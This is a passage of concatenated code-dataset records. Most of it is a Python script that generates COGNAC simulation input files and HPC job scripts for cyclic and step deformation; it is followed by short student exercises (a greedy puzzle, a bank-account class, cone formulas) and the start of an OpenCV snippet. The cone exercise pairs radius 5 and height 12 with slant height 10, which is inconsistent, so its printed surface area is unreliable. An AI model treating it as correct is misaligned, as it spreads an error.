var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\n\tmake_cycle_batch(cyc_def_max, cyc_rate, rotate)\n\n\treturn\n\n# ファイル名を設定し、バッチファイルを作成\ndef make_cycle_batch(cyc_def_max, cyc_rate, rotate):\n\trepeatcount = ''\n\tcalc_all = \"#!/bin/bash\\n\"\n\tjobname = 'name' + str(uuid.uuid4())\n\tvar.batch = \"#!/bin/bash\\n\"\n\tfor var.cyc_count in range(var.cyc_deform_cond_dic[cyc_def_max][0]):\n\t\tvar.cyc_resol = var.cyc_deform_cond_dic[cyc_def_max][2]\n\t\tcalc_all = make_cycle(cyc_def_max, cyc_rate, rotate, calc_all, jobname)\n\t\trepeatcount += str(var.cyc_count) + ' '\n\t\tif platform.system() == \"Windows\":\n\t\t\tif var.cyclic_deform == 'CyclicStretch':\n\t\t\t\tvar.batch += 'evaluate_cyclic_deform -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m stretch\\n'\n\t\t\telif var.cyclic_deform == 'CyclicShear':\n\t\t\t\tvar.batch += 'evaluate_cyclic_deform -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m shear\\n'\n\t\t\t\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, 'calc.bat', var.batch)\n\t#\n\tif platform.system() == \"Linux\":\n\t\tevaluate = '#!/bin/sh\\n'\n\t\tif var.cyclic_deform == 'CyclicStretch':\n\t\t\tevaluate += 'cyclic_deform.py -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m stretch\\n'\n\t\telif var.cyclic_deform == 'CyclicShear':\n\t\t\tevaluate += 'cyclic_deform.py -f ' + str(var.func) + ' -n ' + str(var.nu) + ' -m shear\\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', evaluate)\n\t\twrite_batchfile(var.calc_dir, 'calc.sh', calc_all)\n\n\treturn\n#\ndef make_cycle(cyc_def_max, cyc_rate, rotate, calc_all, jobname):\n\tfor var.cyc_direction in ['_Forward', '_Backward']:\n\t\t# UDFファイル名を設定\n\t\tuin = 'No_' +str(var.cyc_count) + var.cyc_direction + \"_uin.udf\"\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + \"_Calculating_Cycle_until_\" + str(cyc_def_max).replace('.', '_') + \"_rate_\" + f\"{cyc_rate:.1e}\".replace('.','_') + '_No' + str(var.cyc_count) + var.cyc_direction)\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, 'No_' + str(var.cyc_count) + var.cyc_direction + \".sh\", calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'pjsub --step --sparam \"jnam={jobname:}\" No_{var.cyc_count:}{var.cyc_direction:}.sh\\n'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tif var.cyc_count == 0 and var.cyc_direction == '_Forward':\n\t\t\tvar.cyc_readudf = 'base.udf'\n\t\tmod_cycle_udf(cyc_def_max, cyc_rate, udf_in)\n\t\tvar.cyc_readudf = uout\n\treturn calc_all\n\n#-----\ndef mod_cycle_udf(cyc_def_max, cyc_rate, udf_in):\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\tdeform_time = (cyc_def_max - 1)/cyc_rate\n\t\tspeed = cyc_rate*var.system_size\n\telif var.cyclic_deform == 'CyclicShear':\n\t\tdeform_time = cyc_def_max/cyc_rate\n\t#\n\ttime_total = 
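`make_cycle()` above chains the half-cycles through their restart UDFs: the first forward run reads `base.udf`, and each subsequent run restarts from the previous output file. A small illustration of the resulting file-name chain for a `Repeat` of 2 (names follow the code above exactly):

```python
# Print the input -> restart-source pairs that make_cycle() wires together.
read_udf = 'base.udf'
for count in range(2):                        # Repeat = 2 cycles
    for direction in ['_Forward', '_Backward']:
        uin = 'No_' + str(count) + direction + '_uin.udf'
        print(uin, 'restarts from', read_udf)
        read_udf = uin.replace('uin', 'out')  # the next run reads this output
```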
round(deform_time/var.sim_time_div)\n\ttime_1_step = round(var.cyc_resol/var.sim_time_div/cyc_rate)\n\t#\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(time_total,\tp + 'Time.Total_Steps')\n\tu.put(time_1_step,\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\t# Deformation\n\tif var.cyclic_deform == 'CyclicStretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \tp + 'Method')\n\t\tu.put('Simple_Elongation', \tp + 'Cell_Deformation.Method')\n\t\tu.put('Deformation_Speed', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tif var.cyc_direction == '_Forward':\n\t\t\tu.put(speed, p + 'Cell_Deformation.Simple_Elongation.Deformation_Speed.Speed')\n\t\telse:\n\t\t\tu.put(-1.*speed, p + 'Cell_Deformation.Simple_Elongation.Deformation_Speed.Speed')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.cyclic_deform == 'CyclicShear':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tif var.cyc_direction == '_Forward':\n\t\t\tu.put(cyc_rate, \t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\telse:\n\t\t\tu.put(-1.*cyc_rate, \tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put([var.cyc_readudf, -1, 1, 1], \tp + 'Restart')\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n\n\n#####\n#\ndef setup_step_deform():\n\t# 計算用のディレクトリーを作成\n\tset_step_basedir()\n\t# \n\tset_rotation_step()\n\t\n\treturn\n\t\n# \ndef set_step_basedir():\n\tvar.step_dir = f'{var.step_deform:}_until_' + f'{var.step_deform_max:.1f}'.replace('.','_') + '_rate_' + f'{var.step_rate:.1e}'.replace('.', '_') + f'_read_{var.read_udf.split(\".\")[0]:}'\n\n\tif os.path.exists(var.step_dir):\n\t\tprint(\"Use existing dir of \", var.step_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.step_dir)\n\t\tos.makedirs(var.step_dir)\n\treturn\n\ndef set_rotation_step():\n\tif var.step_deform == 'StepShear':\n\t\tvar.step_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\telif var.step_deform == 'StepStretch':\n\t\tvar.step_rotate = ['base', 'x', 'y']\n\tfor rotate in var.step_rotate:\n\t\tset_rotate_dir(rotate)\n\t\tset_udf_batch(rotate)\n\t#\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\t#\n\t\tif var.step_deform == 'StepStretch':\n\t\t\toption = f'evaluate_step_deform -f {var.func} -n {var.nu} -m stretch -a\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\toption = f'evaluate_step_deform -f {var.func} -n {var.nu} -m shear -a\\n'\n\telif platform.system() == 
\"Linux\":\n\t\ttask = 'sh calc_all.sh &\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t#\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\tif var.step_deform == 'StepStretch':\n\t\t\toption2 = f'step_deform.py -f {var.func} -n {var.nu} -m stretch -a\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\toption2 = f'step_deform.py -f {var.func} -n {var.nu} -m shear -a\\n'\n\t\tmake_batch_series(var.step_dirlist, var.step_dir, task2, filename2, option2)\n\t\n\tmake_batch_series(var.step_dirlist, var.step_dir, task, filename, option)\n\treturn\n\ndef set_rotate_dir(rotate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.step_dirlist.append(tmp_dir)\n\tvar.calc_dir = os.path.join(var.step_dir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\treturn\n\n# アトムのポジションを回転\ndef rotate_position(u, axis):\n\tR = rotate(axis, np.pi/2.)\n\tu.jump(u.totalRecord() - 1)\n\tpos = u.get('Structure.Position.mol[].atom[]')\n\tfor i, mol in enumerate(pos):\n\t\tfor j, atom in enumerate(mol):\n\t\t\ttmp = list(np.dot(np.array(R), np.array(atom)))\n\t\t\tu.put(tmp, 'Structure.Position.mol[].atom[]', [i, j])\n\treturn\n\ndef rotate(axis, deg):\n\tif axis == 'x':\n\t\tR = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\telif axis == 'y':\n\t\tR = [\n\t\t\t[np.cos(deg), 0., np.sin(deg)],\n\t\t\t[0., 1., 0.],\n\t\t\t[-1*np.sin(deg), 0., np.cos(deg)]\n\t\t]\n\telif axis == 'z':\n\t\tR = [\n\t\t\t[np.cos(deg), -1*np.sin(deg), 0.],\n\t\t\t[np.sin(deg), np.cos(deg), 0.],\n\t\t\t[0., 0., 1.]\n\t\t]\n\telif axis == 'yx':\n\t\tRy = [\n\t\t\t[np.cos(deg), 0., np.sin(deg)],\n\t\t\t[0., 1., 0.],\n\t\t\t[-1*np.sin(deg), 0., np.cos(deg)]\n\t\t]\n\t\tRx = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\t\tR = list(np.dot(np.array(Rx), np.array(Ry)))\n\telif axis == 'zx':\n\t\tRz = [\n\t\t\t[np.cos(deg), -1*np.sin(deg), 0.],\n\t\t\t[np.sin(deg), np.cos(deg), 0.],\n\t\t\t[0., 0., 1.]\n\t\t]\n\t\tRx = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\t\tR = list(np.dot(np.array(Rx), np.array(Rz)))\n\treturn R\n\ndef set_udf_batch(rotate):\n\t# UDFファイル名を設定\n\tbase = f'{var.step_deform}_until_' + f'{var.step_deform_max:.1e}'.replace('.', '_') + '_rate_' + f'{var.step_rate:.1e}'.replace('.', '_') + f'_{rotate}'\n\t#\n\tuin = 'deform_uin.udf'\n\tuout = uin.replace(\"uin\", \"out\")\n\tif platform.system() == \"Windows\":\n\t\tmake_title(var.title_name + '_' + base + \"_deform\")\n\t\tvar.batch = \"#!/bin/bash\\n\"\n\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\telif platform.system() == \"Linux\":\n\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\tcalc_sh += '#PJM -S\\n'\n\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\tcalc_sh += 
'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t# バッチファイルを作成\n\t\twrite_batchfile(var.calc_dir, f'deform.sh', calc_sh)\n\t\t#\n\t\tcalc_all = \"#!/bin/bash\\n\"\n\t\tcalc_all += 'JID=`pjsub -z jid deform.sh`\\n'\n\t\tcalc_all += 'if [ $? -ne 0 ]; then\\n'\n\t\tcalc_all += 'exit 1\\n'\n\t\tcalc_all += 'fi\\n'\n\t\tcalc_all += 'set -- `pjwait $JID`\\n'\n\t\tcalc_all += 'if [ $2 != \"0\" -o $3 != \"0\" ]; then\\n'\n\t\tcalc_all += 'exit 1\\n'\n\t\tcalc_all += 'fi\\n'\n\tudf_in = os.path.join(var.calc_dir, uin)\n\tmake_stepdeform_udf(udf_in)\n\tprev_udf = uin.replace(\"uin\", \"out\")\n\n\t# 各放置時間における緩和計算を設定\n\tfor i, condition in enumerate(var.step_relaxation):\n\t\tuin = f'relaxation_{i}_uin.udf'\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + '_' + base + f'_relaxation_{i}')\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, f'relaxation_{i:}.sh', calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'pjsub relaxation_{i:}.sh\\n'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tmake_steprelax_udf(udf_in, prev_udf, condition)\n\t\n\t# 最長の緩和計算のUDFをリスタートにして長時間計算を繰り返す。\n\trepeat = var.step_repeat[0]\n\tfor i in range(repeat):\n\t\tcondition = var.step_repeat[1:]\n\t\tuin = f'repeat_{i}_uin.udf'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + '_' + base + f'_repeat_{i}')\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, f'repeat_{i:}.sh', calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'JID=`pjsub -z jid repeat_{i:}.sh`\\n'\n\t\t\tcalc_all += 'if [ $? 
-ne 0 ]; then\\n'\n\t\t\tcalc_all += 'exit 1\\n'\n\t\t\tcalc_all += 'fi\\n'\n\t\t\tcalc_all += 'set -- `pjwait $JID`\\n'\n\t\t\tcalc_all += 'if [ $2 != \"0\" -o $3 != \"0\" ]; then\\n'\n\t\t\tcalc_all += 'exit 1\\n'\n\t\t\tcalc_all += 'fi\\n'\n\t\tmake_steprelax_udf(udf_in, prev_udf, condition)\n\t\tprev_udf = uin.replace(\"uin\", \"out\")\n\t#\n\tif platform.system() == \"Windows\":\n\t\tif var.step_deform == 'StepStretch':\n\t\t\tvar.batch += f'evaluate_step_deform -f {var.func} -n {var.nu} -m stretch\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\tvar.batch += f'evaluate_step_deform -f {var.func} -n {var.nu} -m shear\\n'\n\t\t# バッチファイルを作成\n\t\twrite_batchfile(var.calc_dir, 'deform.bat', var.batch)\n\telif platform.system() == \"Linux\":\n\t\teval = \"#!/bin/bash\\n\"\n\t\tif var.step_deform == 'StepStretch':\n\t\t\teval += f'step_deform.py -f {var.func} -n {var.nu} -m stretch\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\teval += f'step_deform.py -f {var.func} -n {var.nu} -m shear\\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', eval)\n\t\twrite_batchfile(var.calc_dir, 'calc_all.sh', calc_all)\n\treturn\n\n#-----\ndef make_stepdeform_udf(udf_in):\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.step_deform_time[0],\tp + 'Time.delta_T')\n\tu.put(var.step_deform_time[1],\tp + 'Time.Total_Steps')\n\tu.put(var.step_deform_time[2],\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Deformation\n\tif var.step_deform == 'StepStretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \t\tp + 'Method')\n\t\tu.put('Simple_Elongation', \t\tp + 'Cell_Deformation.Method')\n\t\tu.put('Initial_Strain_Rate', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tu.put(var.step_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tif var.step_deform_max < 1:\n\t\t\tu.put(-1*var.step_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.step_deform == 'StepShear':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tu.put(var.step_rate, \t\t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put(['', -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n#-----\ndef make_steprelax_udf(udf_in, prev_udf, condition):\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\n\t# Dynamics_Conditions\n\tp = 
'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(round(condition[0]/var.sim_time_div),\tp + 'Time.Total_Steps')\n\tu.put(round(condition[0]/var.sim_time_div/condition[1]),\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\t\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put([prev_udf, -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put([prev_udf, -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n###########################################\n# ターミナルのタイトルを設定\ndef make_title(title):\n\tif platform.system() == \"Windows\":\n\t\tvar.batch += \"title \" + title + \"\\n\"\n\telif platform.system() == \"Linux\":\n\t\tvar.batch += r'echo -ne \"\\033]0; ' + title + ' \\007\"' + '\\n'\n\treturn\n#\ndef write_batchfile(dir, filename, batch_file):\n\t# バッチファイルを作成\n\tf_batch = os.path.join(dir, filename)\n\twith open(f_batch, 'w') as f:\n\t\tf.write(batch_file)\n\tif platform.system() == \"Linux\":\n\t\tos.chmod(f_batch, 0o744)\n\treturn\n\n#######################################\n# サブディレクトリを使うバッチファイルを作成\ndef make_batch_series(subdir_list, dir, task, filename, option):\n\tbatch_series = ''\n\tfor subdir in subdir_list:\n\t\tif platform.system() == \"Windows\":\n\t\t\tbatch_series += 'cd /d %~dp0\\\\' + subdir +'\\n'\n\t\t\tbatch_series += task\n\t\t\tbatch_series += 'cd /d %~dp0\\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tbatch_series += 'cd ./' + subdir +'\\n'\n\t\t\tbatch_series += task\n\t\t\tbatch_series += 'cd ../\\n'\n\tif option != '':\n\t\tbatch_series += option\n\twrite_batchfile(dir, filename, batch_series)\n\treturn\n\n##########################\n# Main\nif __name__=='__main__':\n\tdeform()","repo_name":"softmatter-design/python-cognac-deform","sub_path":"src/cognac_deform/DeformSetup.py","file_name":"DeformSetup.py","file_ext":"py","file_size_in_byte":39800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12553183868","text":"\"\"\"\n @ Baek 10610. 30\n @ Prob. https://www.acmicpc.net/problem/10610\n Ref. \n @ Algo: Greedy\n @ Start day: 20. 08. 26.\n @ End day: 20. 08. 26.\n\"\"\"\n\n\n\nN = [int(i) for i in input()]\nN.sort(reverse=True)\nif N[-1] == 0 and sum(N) % 3 == 0:\n print(\"\".join(map(str, N)))\nelse:\n print(-1)\n\n\n\"\"\"\n102\n>\n210\n\"\"\"\n\n","repo_name":"KoEonYack/LevelUp-Algorithm","sub_path":"Greedy/Baek_10610_2.py","file_name":"Baek_10610_2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"16759362098","text":"#assisgnment 6.1\r\nclass Bank_account:\r\n def __init__(self):\r\n self.balance = 0\r\n print('HELLO!!!! 
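The Baek 10610 record above leans on a standard divisibility fact: a number is a multiple of 30 exactly when it contains a 0 digit (divisible by 10) and its digit sum is divisible by 3, so the digits sorted in descending order give the largest candidate. A brute-force cross-check, illustrative only and not part of the submission:

```python
from itertools import permutations

def brute(n):
    # Largest permutation of n's digits divisible by 30, or -1 if none exists.
    return max((int(''.join(p)) for p in permutations(str(n))
                if int(''.join(p)) % 30 == 0), default=-1)

assert brute(102) == 210   # matches the sample in the comment above
assert brute(123) == -1    # no zero digit, so no multiple of 30
```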
Welcome To The Deposit & Withdrawal Machine')\r\n\r\n def Deposit(self):\r\n amount = float(input(\"Enter amount to be deposited:\"))\r\n self.balance += amount\r\n print(\"\\n Amount Deposited: \",amount)\r\n\r\n def withdraw(self):\r\n amount = float(input(\"Enter amount to be Withdrawn:\"))\r\n if self.balance >= amount:\r\n self.balance -= amount\r\n print(\"\\n You withdrew: \",amount)\r\n else:\r\n print(\"\\n Insufficient Balance \")\r\n def display(self):\r\n print(\"\\n Net Available Balance = \",self.balance)\r\ns = Bank_account()\r\ns.Deposit()\r\ns.withdraw()\r\ns.display()\r\n\r\n\"\"\"\r\nOUTPUT\r\n\r\nHELLO!!!! Welcome To The Deposit & Withdrawal Machine\r\nEnter amount to be deposited:5000\r\n\r\n Amount Deposited: 5000.0\r\nEnter amount to be Withdrawn:1000\r\n\r\n You withdrew: 1000.0\r\n\r\n Net Available Balance = 4000.0\r\n \r\n \"\"\"\r\n\r\n#assisgnment 6.2\r\n\r\nimport math\r\npi = math.pi\r\ndef volume (radius,height):\r\n return (1/3)*pi*radius*radius*height\r\ndef surfacearea (radius,slantheight):\r\n return pi*radius*slantheight+pi*radius*radius\r\nradius = float(5)\r\nheight = float(12)\r\nslantheight = float(10)\r\nprint(\"volume of cone :\" ,volume(radius,height))\r\nprint(\"surface area of cone : \" ,surfacearea(radius,slantheight))\r\n\r\n\"\"\"\r\noutput\r\n\r\nvolume of cone : 314.15926535897927\r\nsurface area of cone : 235.61944901923448\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Priyankashirsat123/LetsUpgrade-Python_B7","sub_path":"assii6.py","file_name":"assii6.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15653234017","text":"import cv2\nimport numpy as np \nimport glob\nimport matplotlib.pyplot as plt\nimport imutils\nfrom scipy import signal\n\ndef find_contour(hsv,low,high,img,center):\n mask = cv2.inRange(hsv,low,high)\n kernel = np.ones((5,5),np.uint8)\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel,iterations=4)\n plt.imshow(opening,cmap='gray')\n plt.show()\n \n cnts = cv2.findContours(opening.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n rect_img = img.copy()\n for c in cnts: \n rect = cv2.minAreaRect(c)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n # cv2.drawContours(rect_img,[box],0,(0,0,255),1)\n # plt.imshow(rect_img[:,:,(2,1,0)])\n # plt.show()\n M = cv2.moments(c)\n cX = int(M['m10'] / M['m00'])\n cY = int(M['m01'] / M['m00'])\n \n center.append([cY,cX,box])\n \n \n return cnts,center\n\n\ndef sharpen(img, sigma=300): \n # sigma = 5、15、25\n blur_img = cv2.GaussianBlur(img, (0, 0), sigma)\n usm = cv2.addWeighted(img, 